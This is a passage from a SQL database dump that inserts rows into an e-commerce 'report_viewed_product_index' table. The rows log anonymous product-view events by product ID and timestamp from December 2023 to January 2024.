(8517, NULL, NULL, 2063, 1, '2023-12-12 20:09:59'),
(8518, NULL, NULL, 2062, 1, '2023-12-12 20:10:07'),
(8519, NULL, NULL, 2060, 1, '2023-12-12 20:10:11'),
(8520, NULL, NULL, 2053, 1, '2023-12-12 23:57:50'),
(8521, NULL, NULL, 2053, 1, '2023-12-13 01:24:06'),
(8522, NULL, NULL, 2054, 1, '2023-12-13 02:31:54'),
(8523, NULL, NULL, 2059, 1, '2023-12-13 03:07:54'),
(8524, NULL, NULL, 2060, 1, '2023-12-13 03:34:43'),
(8525, NULL, NULL, 2063, 1, '2023-12-13 05:07:29'),
(8526, NULL, NULL, 2053, 1, '2023-12-13 07:37:27'),
(8527, NULL, NULL, 2064, 1, '2023-12-13 07:40:30'),
(8528, NULL, NULL, 2054, 1, '2023-12-13 13:02:33'),
(8529, NULL, NULL, 2064, 1, '2023-12-13 14:54:37'),
(8530, NULL, NULL, 2064, 1, '2023-12-13 15:36:03'),
(8531, NULL, NULL, 2054, 1, '2023-12-13 15:48:49'),
(8532, NULL, NULL, 2058, 1, '2023-12-13 15:49:03'),
(8533, NULL, NULL, 2064, 1, '2023-12-13 15:49:12'),
(8534, NULL, NULL, 2059, 1, '2023-12-13 15:49:36'),
(8535, NULL, NULL, 2060, 1, '2023-12-13 15:50:20'),
(8536, NULL, NULL, 2053, 1, '2023-12-13 15:50:27'),
(8537, NULL, NULL, 2053, 1, '2023-12-13 16:09:52'),
(8538, NULL, NULL, 2063, 1, '2023-12-13 19:05:49'),
(8539, NULL, NULL, 2060, 1, '2023-12-13 19:06:52'),
(8540, NULL, NULL, 2064, 1, '2023-12-13 20:45:18'),
(8541, NULL, NULL, 2062, 1, '2023-12-13 20:45:24'),
(8542, NULL, NULL, 2064, 1, '2023-12-14 00:34:49'),
(8543, NULL, NULL, 2054, 1, '2023-12-14 00:39:15'),
(8544, NULL, NULL, 2053, 1, '2023-12-14 00:54:51'),
(8545, NULL, NULL, 2063, 1, '2023-12-14 02:14:46'),
(8546, NULL, NULL, 2063, 1, '2023-12-14 03:04:46'),
(8547, NULL, NULL, 2060, 1, '2023-12-14 03:07:53'),
(8548, NULL, NULL, 2059, 1, '2023-12-14 07:00:27'),
(8549, NULL, NULL, 2059, 1, '2023-12-14 07:00:28'),
(8550, NULL, NULL, 2054, 1, '2023-12-14 07:35:16'),
(8551, NULL, NULL, 2054, 1, '2023-12-14 12:02:55'),
(8552, NULL, NULL, 2055, 1, '2023-12-14 12:02:56'),
(8553, NULL, NULL, 2059, 1, '2023-12-14 12:02:57'),
(8554, NULL, NULL, 2060, 1, '2023-12-14 12:02:57'),
(8555, NULL, NULL, 2061, 1, '2023-12-14 12:02:58'),
(8556, NULL, NULL, 2062, 1, '2023-12-14 12:02:59'),
(8557, NULL, NULL, 2058, 1, '2023-12-14 12:03:00'),
(8558, NULL, NULL, 2063, 1, '2023-12-14 12:03:01'),
(8559, NULL, NULL, 2064, 1, '2023-12-14 12:03:02'),
(8560, NULL, NULL, 2053, 1, '2023-12-14 12:03:11'),
(8561, NULL, NULL, 2063, 1, '2023-12-14 12:28:32'),
(8562, NULL, NULL, 2064, 1, '2023-12-14 12:35:54'),
(8563, NULL, NULL, 2060, 1, '2023-12-14 13:05:44'),
(8564, NULL, NULL, 2053, 1, '2023-12-14 15:35:42'),
(8565, NULL, NULL, 2054, 1, '2023-12-14 16:05:29'),
(8566, NULL, NULL, 2063, 1, '2023-12-14 17:02:05'),
(8567, NULL, NULL, 2060, 1, '2023-12-14 21:02:40'),
(8568, NULL, NULL, 2064, 1, '2023-12-15 00:38:15'),
(8569, NULL, NULL, 2053, 1, '2023-12-15 00:39:47'),
(8570, NULL, NULL, 2055, 1, '2023-12-15 00:42:06'),
(8571, NULL, NULL, 2064, 1, '2023-12-15 01:07:18'),
(8572, NULL, NULL, 2054, 1, '2023-12-15 01:07:38'),
(8573, NULL, NULL, 2060, 1, '2023-12-15 01:37:55'),
(8574, NULL, NULL, 2061, 1, '2023-12-15 01:37:56'),
(8575, NULL, NULL, 2055, 1, '2023-12-15 01:38:26'),
(8576, NULL, NULL, 2055, 1, '2023-12-15 02:38:45'),
(8577, NULL, NULL, 2060, 1, '2023-12-15 07:14:35'),
(8578, NULL, NULL, 2063, 1, '2023-12-15 07:26:51'),
(8579, NULL, NULL, 2058, 1, '2023-12-15 07:59:24'),
(8580, NULL, NULL, 2055, 1, '2023-12-15 08:59:14'),
(8581, NULL, NULL, 2059, 1, '2023-12-15 10:36:03'),
(8582, NULL, NULL, 2061, 1, '2023-12-15 10:42:40'),
(8583, NULL, NULL, 2062, 1, '2023-12-15 11:34:48'),
(8584, NULL, NULL, 2061, 1, '2023-12-15 13:06:17'),
(8585, NULL, NULL, 2064, 1, '2023-12-15 13:06:39'),
(8586, NULL, NULL, 2053, 1, '2023-12-15 13:10:11'),
(8587, NULL, NULL, 2054, 1, '2023-12-15 13:10:44'),
(8588, NULL, NULL, 2059, 1, '2023-12-15 13:31:05'),
(8589, NULL, NULL, 2061, 1, '2023-12-15 13:36:37'),
(8590, NULL, NULL, 2064, 1, '2023-12-15 13:48:16'),
(8591, NULL, NULL, 2060, 1, '2023-12-15 15:09:33'),
(8592, NULL, NULL, 2054, 1, '2023-12-15 16:08:57'),
(8593, NULL, NULL, 2054, 1, '2023-12-16 00:39:13'),
(8594, NULL, NULL, 2064, 1, '2023-12-16 01:07:27'),
(8595, NULL, NULL, 2055, 1, '2023-12-16 01:07:30'),
(8596, NULL, NULL, 2053, 1, '2023-12-16 01:10:17'),
(8597, NULL, NULL, 2060, 1, '2023-12-16 01:19:10'),
(8598, NULL, NULL, 2063, 1, '2023-12-16 01:30:21'),
(8599, NULL, NULL, 2058, 1, '2023-12-16 01:59:02'),
(8600, NULL, NULL, 2055, 1, '2023-12-16 02:51:38'),
(8601, NULL, NULL, 2061, 1, '2023-12-16 04:35:15'),
(8602, NULL, NULL, 2062, 1, '2023-12-16 05:26:22'),
(8603, NULL, NULL, 2061, 1, '2023-12-16 05:44:44'),
(8604, NULL, NULL, 2054, 1, '2023-12-16 07:01:24'),
(8605, NULL, NULL, 2059, 1, '2023-12-16 07:21:25'),
(8606, NULL, NULL, 2064, 1, '2023-12-16 07:38:00'),
(8607, NULL, NULL, 2063, 1, '2023-12-16 10:07:55'),
(8608, NULL, NULL, 2063, 1, '2023-12-16 10:35:58'),
(8609, NULL, NULL, 2054, 1, '2023-12-16 12:36:59'),
(8610, NULL, NULL, 2061, 1, '2023-12-16 12:52:08'),
(8611, NULL, NULL, 2064, 1, '2023-12-16 13:08:21'),
(8612, NULL, NULL, 2061, 1, '2023-12-16 13:09:59'),
(8613, NULL, NULL, 2059, 1, '2023-12-16 14:00:41'),
(8614, NULL, NULL, 2061, 1, '2023-12-16 14:29:17'),
(8615, NULL, NULL, 2061, 1, '2023-12-16 14:43:21'),
(8616, NULL, NULL, 2063, 1, '2023-12-16 18:54:50'),
(8617, NULL, NULL, 2063, 1, '2023-12-16 18:54:54'),
(8618, NULL, NULL, 2054, 1, '2023-12-16 19:24:12'),
(8619, NULL, NULL, 2053, 1, '2023-12-16 19:41:04'),
(8620, NULL, NULL, 2054, 1, '2023-12-17 01:09:14'),
(8621, NULL, NULL, 2055, 1, '2023-12-17 02:08:33'),
(8622, NULL, NULL, 2064, 1, '2023-12-17 02:50:27'),
(8623, NULL, NULL, 2058, 1, '2023-12-17 03:37:03'),
(8624, NULL, NULL, 2055, 1, '2023-12-17 05:07:49'),
(8625, NULL, NULL, 2061, 1, '2023-12-17 05:59:52'),
(8626, NULL, NULL, 2061, 1, '2023-12-17 05:59:54'),
(8627, NULL, NULL, 2053, 1, '2023-12-17 06:43:57'),
(8628, NULL, NULL, 2064, 1, '2023-12-17 12:40:38'),
(8629, NULL, NULL, 2054, 1, '2023-12-17 13:09:54'),
(8630, NULL, NULL, 2058, 1, '2023-12-17 13:40:33'),
(8631, NULL, NULL, 2053, 1, '2023-12-17 15:34:21'),
(8632, NULL, NULL, 2062, 1, '2023-12-17 15:39:04'),
(8633, NULL, NULL, 2059, 1, '2023-12-17 16:09:24'),
(8634, NULL, NULL, 2062, 1, '2023-12-17 17:45:10'),
(8635, NULL, NULL, 2062, 1, '2023-12-17 18:10:45'),
(8636, NULL, NULL, 2060, 1, '2023-12-17 18:18:02'),
(8637, NULL, NULL, 2063, 1, '2023-12-18 05:32:49'),
(8638, NULL, NULL, 2054, 1, '2023-12-18 08:41:46'),
(8639, NULL, NULL, 2063, 1, '2023-12-18 10:56:33'),
(8640, NULL, NULL, 2064, 1, '2023-12-18 10:56:36'),
(8641, NULL, NULL, 2064, 1, '2023-12-18 10:56:38'),
(8642, NULL, NULL, 2063, 1, '2023-12-18 10:57:25'),
(8643, NULL, NULL, 2064, 1, '2023-12-18 11:02:07');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(8644, NULL, NULL, 2059, 1, '2023-12-18 14:19:59'),
(8645, NULL, NULL, 2061, 1, '2023-12-18 14:55:29'),
(8646, NULL, NULL, 2061, 1, '2023-12-18 14:55:30'),
(8647, NULL, NULL, 2061, 1, '2023-12-18 14:55:35'),
(8648, NULL, NULL, 2059, 1, '2023-12-18 15:19:07'),
(8649, NULL, NULL, 2064, 1, '2023-12-18 19:18:17'),
(8650, NULL, NULL, 2054, 1, '2023-12-18 20:02:45'),
(8651, NULL, NULL, 2062, 1, '2023-12-19 00:50:44'),
(8652, NULL, NULL, 2059, 1, '2023-12-19 01:10:13'),
(8653, NULL, NULL, 2059, 1, '2023-12-19 01:37:26'),
(8654, NULL, NULL, 2053, 1, '2023-12-19 01:40:22'),
(8655, NULL, NULL, 2064, 1, '2023-12-19 03:20:12'),
(8656, NULL, NULL, 2054, 1, '2023-12-19 04:09:58'),
(8657, NULL, NULL, 2060, 1, '2023-12-19 05:11:49'),
(8658, NULL, NULL, 2064, 1, '2023-12-19 05:47:08'),
(8659, NULL, NULL, 2058, 1, '2023-12-19 09:55:21'),
(8660, NULL, NULL, 2063, 1, '2023-12-19 09:58:24'),
(8661, NULL, NULL, 2053, 1, '2023-12-19 13:09:05'),
(8662, NULL, NULL, 2064, 1, '2023-12-19 13:09:11'),
(8663, NULL, NULL, 2060, 1, '2023-12-19 13:10:14'),
(8664, NULL, NULL, 2054, 1, '2023-12-19 13:39:40'),
(8665, NULL, NULL, 2058, 1, '2023-12-19 13:39:48'),
(8666, NULL, NULL, 2059, 1, '2023-12-19 14:08:46'),
(8667, NULL, NULL, 2054, 1, '2023-12-19 14:40:13'),
(8668, NULL, NULL, 2061, 1, '2023-12-19 16:13:05'),
(8669, NULL, NULL, 2058, 1, '2023-12-19 18:06:57'),
(8670, NULL, NULL, 2064, 1, '2023-12-20 01:45:24'),
(8671, NULL, NULL, 2063, 1, '2023-12-20 01:45:47'),
(8672, NULL, NULL, 2061, 1, '2023-12-20 02:38:31'),
(8673, NULL, NULL, 2053, 1, '2023-12-20 02:48:01'),
(8674, NULL, NULL, 2059, 1, '2023-12-20 03:51:52'),
(8675, NULL, NULL, 2054, 1, '2023-12-20 05:08:18'),
(8676, NULL, NULL, 2058, 1, '2023-12-20 05:29:13'),
(8677, NULL, NULL, 2053, 1, '2023-12-20 13:20:24'),
(8678, NULL, NULL, 2064, 1, '2023-12-20 14:07:50'),
(8679, NULL, NULL, 2063, 1, '2023-12-20 14:59:27'),
(8680, NULL, NULL, 2054, 1, '2023-12-20 17:12:33'),
(8681, NULL, NULL, 2058, 1, '2023-12-20 17:28:02'),
(8682, NULL, NULL, 2061, 1, '2023-12-20 17:28:43'),
(8683, NULL, NULL, 2062, 1, '2023-12-20 18:10:23'),
(8684, NULL, NULL, 2064, 1, '2023-12-20 18:11:58'),
(8685, NULL, NULL, 2062, 1, '2023-12-20 18:11:58'),
(8686, NULL, NULL, 2063, 1, '2023-12-20 18:11:59'),
(8687, NULL, NULL, 2064, 1, '2023-12-20 18:12:07'),
(8688, NULL, NULL, 2062, 1, '2023-12-20 18:20:08'),
(8689, NULL, NULL, 2063, 1, '2023-12-20 18:26:29'),
(8690, NULL, NULL, 2064, 1, '2023-12-20 18:27:21'),
(8691, NULL, NULL, 2064, 1, '2023-12-20 18:38:31'),
(8692, NULL, NULL, 2055, 1, '2023-12-20 18:39:00'),
(8693, NULL, NULL, 2054, 1, '2023-12-20 18:40:19'),
(8694, NULL, NULL, 2053, 1, '2023-12-21 00:48:02'),
(8695, NULL, NULL, 2064, 1, '2023-12-21 01:17:41'),
(8696, NULL, NULL, 2063, 1, '2023-12-21 03:38:22'),
(8697, NULL, NULL, 2054, 1, '2023-12-21 06:18:11'),
(8698, NULL, NULL, 2053, 1, '2023-12-21 08:42:15'),
(8699, NULL, NULL, 2059, 1, '2023-12-21 08:44:46'),
(8700, NULL, NULL, 2064, 1, '2023-12-21 14:13:52'),
(8701, NULL, NULL, 2054, 1, '2023-12-21 15:27:58'),
(8702, NULL, NULL, 2053, 1, '2023-12-21 19:11:41'),
(8703, NULL, NULL, 2059, 1, '2023-12-21 23:51:01'),
(8704, NULL, NULL, 2064, 1, '2023-12-22 02:23:56'),
(8705, NULL, NULL, 2054, 1, '2023-12-22 03:09:21'),
(8706, NULL, NULL, 2059, 1, '2023-12-22 04:11:36'),
(8707, NULL, NULL, 2053, 1, '2023-12-22 04:12:04'),
(8708, NULL, NULL, 2055, 1, '2023-12-22 05:53:24'),
(8709, NULL, NULL, 2064, 1, '2023-12-22 15:41:43'),
(8710, NULL, NULL, 2054, 1, '2023-12-22 15:58:07'),
(8711, NULL, NULL, 2053, 1, '2023-12-22 16:06:12'),
(8712, NULL, NULL, 2055, 1, '2023-12-22 16:55:02'),
(8713, NULL, NULL, 2061, 1, '2023-12-22 17:17:30'),
(8714, NULL, NULL, 2061, 1, '2023-12-22 17:17:32'),
(8715, NULL, NULL, 2061, 1, '2023-12-22 17:17:32'),
(8716, NULL, NULL, 2060, 1, '2023-12-22 17:45:56'),
(8717, NULL, NULL, 2055, 1, '2023-12-23 01:11:48'),
(8718, NULL, NULL, 2062, 1, '2023-12-23 01:58:08'),
(8719, NULL, NULL, 2064, 1, '2023-12-23 02:41:47'),
(8720, NULL, NULL, 2054, 1, '2023-12-23 04:01:33'),
(8721, NULL, NULL, 2053, 1, '2023-12-23 04:18:13'),
(8722, NULL, NULL, 2054, 1, '2023-12-23 07:22:40'),
(8723, NULL, NULL, 2062, 1, '2023-12-23 12:44:11'),
(8724, NULL, NULL, 2053, 1, '2023-12-23 13:26:56'),
(8725, NULL, NULL, 2064, 1, '2023-12-23 14:07:58'),
(8726, NULL, NULL, 2061, 1, '2023-12-23 14:07:58'),
(8727, NULL, NULL, 2062, 1, '2023-12-23 14:07:58'),
(8728, NULL, NULL, 2063, 1, '2023-12-23 14:07:58'),
(8729, NULL, NULL, 2059, 1, '2023-12-23 14:07:58'),
(8730, NULL, NULL, 2058, 1, '2023-12-23 14:07:58'),
(8731, NULL, NULL, 2055, 1, '2023-12-23 14:07:58'),
(8732, NULL, NULL, 2054, 1, '2023-12-23 14:07:58'),
(8733, NULL, NULL, 2060, 1, '2023-12-23 14:07:58'),
(8734, NULL, NULL, 2064, 1, '2023-12-23 16:50:17'),
(8735, NULL, NULL, 2054, 1, '2023-12-23 18:47:03'),
(8736, NULL, NULL, 2063, 1, '2023-12-24 02:55:56'),
(8737, NULL, NULL, 2063, 1, '2023-12-24 02:55:58'),
(8738, NULL, NULL, 2060, 1, '2023-12-24 03:19:08'),
(8739, NULL, NULL, 2064, 1, '2023-12-24 03:34:07'),
(8740, NULL, NULL, 2063, 1, '2023-12-24 04:05:37'),
(8741, NULL, NULL, 2063, 1, '2023-12-24 05:04:39'),
(8742, NULL, NULL, 2060, 1, '2023-12-24 05:38:40'),
(8743, NULL, NULL, 2060, 1, '2023-12-24 05:57:45'),
(8744, NULL, NULL, 2063, 1, '2023-12-24 06:11:41'),
(8745, NULL, NULL, 2053, 1, '2023-12-24 08:24:35'),
(8746, NULL, NULL, 2064, 1, '2023-12-24 14:08:46'),
(8747, NULL, NULL, 2062, 1, '2023-12-24 15:19:08'),
(8748, NULL, NULL, 2053, 1, '2023-12-24 17:44:16'),
(8749, NULL, NULL, 2060, 1, '2023-12-24 18:33:09'),
(8750, NULL, NULL, 2063, 1, '2023-12-24 18:42:41'),
(8751, NULL, NULL, 2054, 1, '2023-12-24 18:52:08'),
(8752, NULL, NULL, 2058, 1, '2023-12-24 19:08:04'),
(8753, NULL, NULL, 2055, 1, '2023-12-24 19:50:09'),
(8754, NULL, NULL, 2061, 1, '2023-12-24 21:10:35'),
(8755, NULL, NULL, 2062, 1, '2023-12-24 22:03:09'),
(8756, NULL, NULL, 2060, 1, '2023-12-24 23:12:30'),
(8757, NULL, NULL, 2063, 1, '2023-12-24 23:21:44'),
(8758, NULL, NULL, 2058, 1, '2023-12-24 23:45:27'),
(8759, NULL, NULL, 2055, 1, '2023-12-25 00:25:20'),
(8760, NULL, NULL, 2064, 1, '2023-12-25 01:21:35'),
(8761, NULL, NULL, 2061, 1, '2023-12-25 01:31:45'),
(8762, NULL, NULL, 2062, 1, '2023-12-25 02:14:53'),
(8763, NULL, NULL, 2054, 1, '2023-12-25 03:51:49'),
(8764, NULL, NULL, 2059, 1, '2023-12-25 04:14:38'),
(8765, NULL, NULL, 2064, 1, '2023-12-25 04:31:06'),
(8766, NULL, NULL, 2053, 1, '2023-12-25 05:47:31'),
(8767, NULL, NULL, 2054, 1, '2023-12-25 06:22:08'),
(8768, NULL, NULL, 2064, 1, '2023-12-25 07:49:24'),
(8769, NULL, NULL, 2060, 1, '2023-12-25 07:54:20'),
(8770, NULL, NULL, 2063, 1, '2023-12-25 08:03:38'),
(8771, NULL, NULL, 2058, 1, '2023-12-25 08:27:59'),
(8772, NULL, NULL, 2055, 1, '2023-12-25 09:09:24'),
(8773, NULL, NULL, 2061, 1, '2023-12-25 10:14:04'),
(8774, NULL, NULL, 2062, 1, '2023-12-25 10:55:58'),
(8775, NULL, NULL, 2054, 1, '2023-12-25 12:18:03'),
(8776, NULL, NULL, 2059, 1, '2023-12-25 12:35:30'),
(8777, NULL, NULL, 2064, 1, '2023-12-25 12:49:02'),
(8778, NULL, NULL, 2060, 1, '2023-12-25 14:01:07'),
(8779, NULL, NULL, 2053, 1, '2023-12-25 14:49:20'),
(8780, NULL, NULL, 2062, 1, '2023-12-25 17:16:22'),
(8781, NULL, NULL, 2062, 1, '2023-12-25 17:43:18'),
(8782, NULL, NULL, 2054, 1, '2023-12-25 17:59:24'),
(8783, NULL, NULL, 2060, 1, '2023-12-25 18:49:54'),
(8784, NULL, NULL, 2063, 1, '2023-12-25 18:59:34'),
(8785, NULL, NULL, 2058, 1, '2023-12-25 19:24:48'),
(8786, NULL, NULL, 2055, 1, '2023-12-25 20:05:29'),
(8787, NULL, NULL, 2064, 1, '2023-12-25 20:06:52'),
(8788, NULL, NULL, 2061, 1, '2023-12-25 21:10:52'),
(8789, NULL, NULL, 2062, 1, '2023-12-25 21:53:03'),
(8790, NULL, NULL, 2054, 1, '2023-12-25 23:16:49'),
(8791, NULL, NULL, 2059, 1, '2023-12-25 23:34:55'),
(8792, NULL, NULL, 2064, 1, '2023-12-25 23:49:11'),
(8793, NULL, NULL, 2055, 1, '2023-12-26 03:34:30'),
(8794, NULL, NULL, 2053, 1, '2023-12-26 04:23:27'),
(8795, NULL, NULL, 2055, 1, '2023-12-26 04:44:35'),
(8796, NULL, NULL, 2064, 1, '2023-12-26 07:28:10'),
(8797, NULL, NULL, 2058, 1, '2023-12-26 08:36:16'),
(8798, NULL, NULL, 2054, 1, '2023-12-26 13:15:54'),
(8799, NULL, NULL, 2061, 1, '2023-12-26 16:54:42'),
(8800, NULL, NULL, 2053, 1, '2023-12-26 17:47:37'),
(8801, NULL, NULL, 2063, 1, '2023-12-26 22:26:07'),
(8802, NULL, NULL, 2054, 1, '2023-12-27 01:17:25'),
(8803, NULL, NULL, 2059, 1, '2023-12-27 01:26:41'),
(8804, NULL, NULL, 2064, 1, '2023-12-27 01:59:56'),
(8805, NULL, NULL, 2055, 1, '2023-12-27 02:17:56'),
(8806, NULL, NULL, 2054, 1, '2023-12-27 03:29:53'),
(8807, NULL, NULL, 2055, 1, '2023-12-27 04:42:55'),
(8808, NULL, NULL, 2053, 1, '2023-12-27 04:47:12'),
(8809, NULL, NULL, 2062, 1, '2023-12-27 04:58:23'),
(8810, NULL, NULL, 2061, 1, '2023-12-27 09:57:57'),
(8811, NULL, NULL, 2053, 1, '2023-12-27 13:07:46'),
(8812, NULL, NULL, 2055, 1, '2023-12-27 13:16:26'),
(8813, NULL, NULL, 2055, 1, '2023-12-27 14:52:05'),
(8814, NULL, NULL, 2061, 1, '2023-12-27 15:16:01'),
(8815, NULL, NULL, 2058, 1, '2023-12-27 15:39:08'),
(8816, NULL, NULL, 2059, 1, '2023-12-27 18:27:30'),
(8817, NULL, NULL, 2054, 1, '2023-12-28 00:01:25'),
(8818, NULL, NULL, 2053, 1, '2023-12-28 04:45:25'),
(8819, NULL, NULL, 2063, 1, '2023-12-28 10:59:28'),
(8820, NULL, NULL, 2063, 1, '2023-12-28 12:22:36'),
(8821, NULL, NULL, 2062, 1, '2023-12-28 15:58:41'),
(8822, NULL, NULL, 2060, 1, '2023-12-28 20:59:26'),
(8823, NULL, NULL, 2061, 1, '2023-12-29 03:41:49'),
(8824, NULL, NULL, 2053, 1, '2023-12-29 04:53:15'),
(8825, NULL, NULL, 2060, 1, '2023-12-29 05:25:36'),
(8826, NULL, NULL, 2054, 1, '2023-12-29 08:29:45'),
(8827, NULL, NULL, 2059, 1, '2023-12-30 01:05:19'),
(8828, NULL, NULL, 2059, 1, '2023-12-30 01:05:23'),
(8829, NULL, NULL, 2064, 1, '2023-12-30 04:41:39'),
(8830, NULL, NULL, 2053, 1, '2023-12-30 05:17:15'),
(8831, NULL, NULL, 2063, 1, '2023-12-30 13:04:41'),
(8832, NULL, NULL, 2062, 1, '2023-12-30 13:08:40'),
(8833, NULL, NULL, 2062, 1, '2023-12-30 13:08:55'),
(8834, NULL, NULL, 2062, 1, '2023-12-30 14:55:57'),
(8835, NULL, NULL, 2061, 1, '2023-12-30 17:14:11'),
(8836, NULL, NULL, 2058, 1, '2023-12-30 17:41:05'),
(8837, NULL, NULL, 2058, 1, '2023-12-30 17:41:21'),
(8838, NULL, NULL, 2064, 1, '2023-12-31 05:43:24'),
(8839, NULL, NULL, 2064, 1, '2023-12-31 07:33:56'),
(8840, NULL, NULL, 2058, 1, '2023-12-31 11:08:47'),
(8841, NULL, NULL, 2060, 1, '2023-12-31 12:57:05'),
(8842, NULL, NULL, 2055, 1, '2023-12-31 13:32:22'),
(8843, NULL, NULL, 2053, 1, '2023-12-31 16:20:27'),
(8844, NULL, NULL, 2060, 1, '2023-12-31 16:37:23'),
(8845, NULL, NULL, 2054, 1, '2023-12-31 16:44:40'),
(8846, NULL, NULL, 2060, 1, '2023-12-31 16:45:21'),
(8847, NULL, NULL, 2061, 1, '2023-12-31 16:54:11'),
(8848, NULL, NULL, 2055, 1, '2023-12-31 18:23:49'),
(8849, NULL, NULL, 2053, 1, '2023-12-31 20:50:42'),
(8850, NULL, NULL, 2063, 1, '2023-12-31 22:09:19'),
(8851, NULL, NULL, 2063, 1, '2023-12-31 22:09:19'),
(8852, NULL, NULL, 2059, 1, '2023-12-31 23:13:11'),
(8853, NULL, NULL, 2060, 1, '2024-01-01 02:07:52'),
(8854, NULL, NULL, 2062, 1, '2024-01-01 02:13:51'),
(8855, NULL, NULL, 2064, 1, '2024-01-01 05:14:19'),
(8856, NULL, NULL, 2054, 1, '2024-01-01 07:22:22'),
(8857, NULL, NULL, 2061, 1, '2024-01-01 09:34:37'),
(8858, NULL, NULL, 2059, 1, '2024-01-01 13:37:42'),
(8859, NULL, NULL, 2055, 1, '2024-01-01 14:49:02'),
(8860, NULL, NULL, 2058, 1, '2024-01-01 15:19:33'),
(8861, NULL, NULL, 2055, 1, '2024-01-01 16:23:22'),
(8862, NULL, NULL, 2053, 1, '2024-01-01 16:26:16'),
(8863, NULL, NULL, 2054, 1, '2024-01-01 17:35:37'),
(8864, NULL, NULL, 2054, 1, '2024-01-01 17:53:35'),
(8865, NULL, NULL, 2062, 1, '2024-01-01 18:30:13'),
(8866, NULL, NULL, 2061, 1, '2024-01-02 02:17:14'),
(8867, NULL, NULL, 2058, 1, '2024-01-02 04:35:41'),
(8868, NULL, NULL, 2053, 1, '2024-01-02 05:20:07'),
(8869, NULL, NULL, 2064, 1, '2024-01-02 05:23:31'),
(8870, NULL, NULL, 2059, 1, '2024-01-02 05:25:56'),
(8871, NULL, NULL, 2054, 1, '2024-01-02 05:57:05'),
(8872, NULL, NULL, 2055, 1, '2024-01-02 06:04:57'),
(8873, NULL, NULL, 2055, 1, '2024-01-02 06:17:21'),
(8874, NULL, NULL, 2064, 1, '2024-01-02 07:16:53'),
(8875, NULL, NULL, 2055, 1, '2024-01-02 07:21:23'),
(8876, NULL, NULL, 2061, 1, '2024-01-02 07:27:26'),
(8877, NULL, NULL, 2064, 1, '2024-01-02 13:54:19'),
(8878, NULL, NULL, 2053, 1, '2024-01-02 13:56:25'),
(8879, NULL, NULL, 2054, 1, '2024-01-02 16:03:29'),
(8880, NULL, NULL, 2054, 1, '2024-01-02 18:20:06'),
(8881, NULL, NULL, 2060, 1, '2024-01-02 21:05:23'),
(8882, NULL, NULL, 2064, 1, '2024-01-03 06:31:02'),
(8883, NULL, NULL, 2064, 1, '2024-01-03 09:27:22'),
(8884, NULL, NULL, 2061, 1, '2024-01-03 09:31:43'),
(8885, NULL, NULL, 2060, 1, '2024-01-03 11:34:36'),
(8886, NULL, NULL, 2063, 1, '2024-01-03 11:46:33'),
(8887, NULL, NULL, 2058, 1, '2024-01-03 12:16:51'),
(8888, NULL, NULL, 2055, 1, '2024-01-03 13:12:02'),
(8889, NULL, NULL, 2055, 1, '2024-01-03 13:13:49'),
(8890, NULL, NULL, 2061, 1, '2024-01-03 14:38:29'),
(8891, NULL, NULL, 2061, 1, '2024-01-03 14:55:23'),
(8892, 1638, NULL, 2061, 1, '2024-01-03 14:55:28'),
(8893, NULL, NULL, 2061, 1, '2024-01-03 14:56:44'),
(8894, NULL, NULL, 2062, 1, '2024-01-03 15:23:33'),
(8895, NULL, NULL, 2060, 1, '2024-01-03 17:10:45'),
(8896, NULL, NULL, 2064, 1, '2024-01-03 17:12:44'),
(8897, NULL, NULL, 2063, 1, '2024-01-03 17:22:54'),
(8898, NULL, NULL, 2058, 1, '2024-01-03 17:53:25'),
(8899, NULL, NULL, 2053, 1, '2024-01-03 18:16:37'),
(8900, NULL, NULL, 2055, 1, '2024-01-03 18:49:21'),
(8901, NULL, NULL, 2060, 1, '2024-01-03 20:39:23'),
(8902, NULL, NULL, 2063, 1, '2024-01-03 20:51:40'),
(8903, NULL, NULL, 2058, 1, '2024-01-03 21:22:07'),
(8904, NULL, NULL, 2055, 1, '2024-01-03 22:21:31'),
(8905, NULL, NULL, 2061, 1, '2024-01-03 23:46:04'),
(8906, NULL, NULL, 2062, 1, '2024-01-04 00:31:50'),
(8907, NULL, NULL, 2054, 1, '2024-01-04 01:54:09'),
(8908, NULL, NULL, 2059, 1, '2024-01-04 02:11:03'),
(8909, NULL, NULL, 2064, 1, '2024-01-04 02:26:07'),
(8910, NULL, NULL, 2055, 1, '2024-01-04 04:17:01'),
(8911, NULL, NULL, 2053, 1, '2024-01-04 04:52:33'),
(8912, NULL, NULL, 2054, 1, '2024-01-04 05:02:39'),
(8913, NULL, NULL, 2064, 1, '2024-01-04 05:26:02'),
(8914, NULL, NULL, 2060, 1, '2024-01-04 07:14:06'),
(8915, NULL, NULL, 2063, 1, '2024-01-04 07:31:55'),
(8916, NULL, NULL, 2058, 1, '2024-01-04 08:16:44'),
(8917, NULL, NULL, 2055, 1, '2024-01-04 09:39:47'),
(8918, NULL, NULL, 2059, 1, '2024-01-04 10:32:13'),
(8919, NULL, NULL, 2061, 1, '2024-01-04 11:53:36'),
(8920, NULL, NULL, 2062, 1, '2024-01-04 12:14:18'),
(8921, NULL, NULL, 2062, 1, '2024-01-04 13:02:41'),
(8922, NULL, NULL, 2054, 1, '2024-01-04 14:25:39'),
(8923, NULL, NULL, 2054, 1, '2024-01-04 15:08:50'),
(8924, NULL, NULL, 2054, 1, '2024-01-04 15:17:38'),
(8925, NULL, NULL, 2053, 1, '2024-01-04 15:23:02'),
(8926, NULL, NULL, 2059, 1, '2024-01-04 15:34:08'),
(8927, NULL, NULL, 2064, 1, '2024-01-04 15:55:36'),
(8928, NULL, NULL, 2054, 1, '2024-01-04 16:55:14'),
(8929, NULL, NULL, 2063, 1, '2024-01-04 21:20:26'),
(8930, NULL, NULL, 2063, 1, '2024-01-04 22:17:55'),
(8931, NULL, NULL, 2054, 1, '2024-01-04 23:05:44'),
(8932, NULL, NULL, 2053, 1, '2024-01-05 04:01:21'),
(8933, NULL, NULL, 2054, 1, '2024-01-05 04:56:36'),
(8934, NULL, NULL, 2061, 1, '2024-01-05 05:09:12'),
(8935, NULL, NULL, 2060, 1, '2024-01-05 07:18:20'),
(8936, NULL, NULL, 2063, 1, '2024-01-05 09:43:24'),
(8937, NULL, NULL, 2063, 1, '2024-01-05 09:43:42'),
(8938, NULL, NULL, 2053, 1, '2024-01-05 16:24:32'),
(8939, NULL, NULL, 2054, 1, '2024-01-05 18:23:53'),
(8940, NULL, NULL, 2054, 1, '2024-01-06 02:19:40'),
(8941, NULL, NULL, 2061, 1, '2024-01-06 03:52:18'),
(8942, NULL, NULL, 2053, 1, '2024-01-06 03:54:17'),
